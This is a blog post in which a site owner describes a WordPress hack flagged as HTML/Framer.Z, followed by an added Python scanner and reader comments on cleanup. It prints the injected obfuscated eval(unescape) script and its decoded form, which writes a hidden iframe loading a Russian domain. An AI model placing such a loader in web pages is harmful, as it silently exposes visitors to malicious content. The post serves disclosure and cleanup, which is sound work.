HTML/Framer.Z Virus in WordPress

Woohoo! I just love it when someone hacks my website and installs a virus. Here’s a nice little flag that AVG gave me:

[Image: Framer.Z Virus in WordPress]

Fortunately, an upgrade from WordPress 2.2 to 2.5 and a little cleanup of the html on the homepage did the trick. This is what some hacker installed on my root index.htm file (commented just in case):

<!-- <script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%34%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%74%72%61%66%66%75%72%6c%2e%72%75%2f%73%6c%69%76%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%37%35%34%37%31%29%2b%27%38%30%35%34%61%38%65%32%65%5c%27%20%77%69%64%74%68%3d%36%36%37%20%68%65%69%67%68%74%3d%34%31%33%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script> -->

And when this code is ‘unescaped’ it translates into:

<!-- window.status='Done';document.write('<iframe name=4 src=\'http://traffurl.ru/sliv?'+Math.round(Math.random()*275471)+'8054a8e2e\' width=667 height=413 style=\'display: none\'></iframe>') -->

I did a whois search on this Russian domain, but didn’t find any results. Thank you hackers for showing the love.
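
As an added example (not code from the original post): a Python scanner that looks through a downloaded copy of a site for eval(unescape("...")) wrappers like the one above, decodes the argument and reports any iframe it writes. The function names, the sample page and the injected.example domain are assumptions made up for the illustration.

```python
import os
import re
from urllib.parse import unquote

# eval(unescape("...")) with a quoted argument, the wrapper shown in this post
WRAPPER = re.compile(r'eval\s*\(\s*unescape\s*\(\s*(["\'])(.*?)\1\s*\)\s*\)', re.S | re.I)
IFRAME = re.compile(r'<iframe\b[^>]*>', re.I)
SRC = re.compile(r'src\s*=\s*\\?["\']?([^"\'\s>\\]+)', re.I)
HIDDEN = re.compile(r'display\s*:\s*none|visibility\s*:\s*hidden', re.I)

def js_unescape(s):
    """Decode like JavaScript unescape(): %uXXXX first, then %XX as Latin-1."""
    s = re.sub(r'%u([0-9a-fA-F]{4})', lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding='latin-1')

def find_injections(text):
    """One finding per iframe written by an eval(unescape(...)) call."""
    findings = []
    for m in WRAPPER.finditer(text):
        decoded = js_unescape(m.group(2))
        for tag in IFRAME.findall(decoded):
            src = SRC.search(tag)
            findings.append({'offset': m.start(),
                             'src': src.group(1) if src else None,
                             'hidden': bool(HIDDEN.search(tag)),
                             'decoded': decoded})
    return findings

def scan_tree(root, exts=('.htm', '.html', '.php')):
    """Walk a downloaded copy of the site; return {path: findings}."""
    hits = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding='latin-1') as fh:
                    found = find_injections(fh.read())
                if found:
                    hits[path] = found
    return hits

# Constructed sample (not the payload from this post): an iframe writer for a
# placeholder domain, percent-encoded character by character.
_JS = "document.write('<iframe src=\\'http://injected.example/in?\\' style=\\'display: none\\'></iframe>')"
SAMPLE = '<p>Home</p><script>eval(unescape("%s"));</script>' % ''.join('%%%02x' % ord(c) for c in _JS)

if __name__ == '__main__':
    for f in find_injections(SAMPLE):
        print(f['offset'], f['src'], 'hidden' if f['hidden'] else 'visible')
```

Files are read as Latin-1 so that any byte sequence loads without a decoding error; the scan only reads files and never renders them.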

6 Responses to “HTML/Framer.Z Virus in WordPress”
  1. Miriam Says:

    Trent,
    It is good you detected the “lovely hacker”. It was very frustrating for me every time I wanted to open your blog and my computer’s security warned me that it had a virus.

  2. Jet Says:

    This html framer.z came up on my AVG virus program too. It’s in the AVG virus vault right now. I don’t see anything on AVG I can use to delete it from my PC. I’m not that experienced to be able to get this framer.z off my PC. I looked on the Norton web site for a program to remove it but didn’t find anything. Can anyone offer some help please?

  3. tom Says:

    What do you do if they have infected your whole site like they did mine? I have a huge site.

  4. Trent M Says:

    You might want to do a global search/replace on your website to get rid of it. It will probably be similar code to the example I posted above. I’d first identify the exact code, then determine if it’s exactly the same across all your infected pages; it likely is. Then if your site is actual separate HTML files, I’d use something like Dreamweaver to do a find/replace to remove it. You can set Dreamweaver to remove all files that contain *code* within a specified folder. If your site is dynamic (database driven), I’d do a search/replace in your MySQL database or whatever you’re using.

  5. DrJ Says:

    It infected my site too.
    But I can’t open the htm and php files and search the code!?
    (AVG not running)
    How can I open/edit the infected files?

  6. Trent M Says:

    You probably had some kind of antivirus program tell you your site was infected. So, whatever page URL you were on at the time you saw the antivirus message is the page you want to first examine.

    Use an FTP program to download your htm/php file and repair it or just upload and replace the infected file with a clean version of the htm/php file, if you have it stored somewhere on your computer.

    If you try to repair, after you download the infected file, open it in Dreamweaver or something that allows you to search the code. You won’t get a virus by opening up the file in an HTML editor, but only by viewing/previewing in a browser. If you don’t have an HTML editor, you can also rename your file extensions from .php to .txt and open in Notepad and find/replace that way too. Just look for funky looking code like in the example listed above on this page.

    Good luck!
